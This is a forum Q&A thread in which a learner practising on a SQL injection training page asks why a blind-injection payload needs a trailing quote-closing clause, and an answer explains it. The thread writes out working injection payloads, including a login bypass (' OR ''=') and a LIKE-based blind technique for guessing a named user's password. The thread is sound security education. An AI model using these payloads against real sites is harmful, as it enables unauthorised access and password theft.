I'm testing some SQL stuff on sqlzoo.net/hack and I'm not getting why
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='
does work for the SQL injection and
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%')
not. Why is it necessary to put this last
AND ''='
?
Also i guess that these SQL injections are very 'old' and won't work. Are there newer methods and are there sites where someone can learn this?
Thanks in advance.
Because you need to close the '.
The code that checks for the password may be something like this:
"SELECT * FROM usersPassword where password = '" + TEXTINPUT + "';"
If you want to simply go in, ' OR ''='
will do the job.
The complete query will be
"SELECT * FROM usersPassword where password = '' OR ''='';"
which is an always true condition.
The example on the website does something more. It checks how the password of a certain user look like, if a certain character is present you will know by the fact that you're able to log in.
EDIT:
In your case the final query will be
"SELECT * FROM usersPassword where password = '' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''=''"
if you don't put the AND
"SELECT * FROM usersPassword where password = '' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%')'"
----> which does not close !